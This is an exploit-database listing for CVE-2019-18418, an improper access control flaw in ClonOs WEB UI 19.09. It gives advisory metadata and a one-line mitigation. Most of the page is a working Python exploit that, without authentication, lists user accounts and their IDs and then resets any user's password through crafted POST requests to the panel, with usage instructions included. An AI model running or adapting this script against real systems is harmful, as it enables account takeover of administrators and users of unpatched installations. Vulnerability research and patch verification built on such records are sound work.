header-logo
Suggest Exploit
vendor:
Clonos WEB UI
by:
İbrahim Hakan Şeker
9.8
CVSS
CRITICAL
Improper Access Control
287
CWE
Product Name: Clonos WEB UI
Affected Version From: 19.09
Affected Version To: 19.09
Patch Exists: NO
Related CWE: CVE-2019-18418
CPE: a:clonos:clonos_web_ui
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: ClonOs
2019

ClonOs WEB UI 19.09 – Improper Access Control

ClonOs WEB UI 19.09 is vulnerable to improper access control. An attacker can exploit this vulnerability to gain access to the user accounts and change the passwords of the users.

Mitigation:

Ensure that proper access control is implemented and that users are authenticated before they are allowed to access the system.
Source

Exploit-DB raw data:

# Exploit Title: ClonOs WEB UI 19.09 - Improper Access Control
# Date: 2019-10-19
# Exploit Author: İbrahim Hakan Şeker
# Vendor Homepage: https://clonos.tekroutine.com/
# Software Link: https://github.com/clonos/control-pane
# Version: 19.09
# Tested on: ClonOs
# CVE : 2019-18418


import requests
from bs4 import BeautifulSoup
import sys

def getUser(host):
    reg=r'\"'
    r1 = requests.post(host+"/json.php",data={"mode":"getJsonPage","path":"/users/","hash":"","db_path":""},headers={"X-Requested-With":"XMLHttpRequest"})
    r1_source = BeautifulSoup(r1.content,"lxml")
    for k in r1_source.findAll("tr"):
        for i in k.findAll("td")[0]:
            print(f"[+]User Found: {i}  User id: {k.get('id').replace(reg,'')}")
def changePassword(host,user,password,id):
    data={
        "mode":"usersEdit",
        "path":"/users/",
        "hash":"",
        "db_path":"",
        "form_data[username]":f"{user}",
        "form_data[password]":f"{password}",
        "form_data[password1]":f"{password}",
        "form_data[first_name]":"",
        "form_data[last_name]":"",
        "form_data[actuser]":"on",
        "form_data[user_id]": int(id)
        }
    r2=requests.post(host,data=data,headers={"X-Requested-With":"XMLHttpRequest"})
    if r2.status_code==200:print("[+]OK")
    else:print("[-]Fail")
if __name__=="__main__":
    if len(sys.argv)>1:
        if "getUser" in sys.argv[1]:getUser(sys.argv[2])
        elif "changePassword" in sys.argv[1]:changePassword(sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5])
        else:print("Fail parameter")
    else:print("Usage: exploit.py getUser [http://ip_adres]\nexploit.py changePassword [http://ip_adres] [username] [new_password] [user_id]")

Navigation

Suggest Exploit

Services By CQR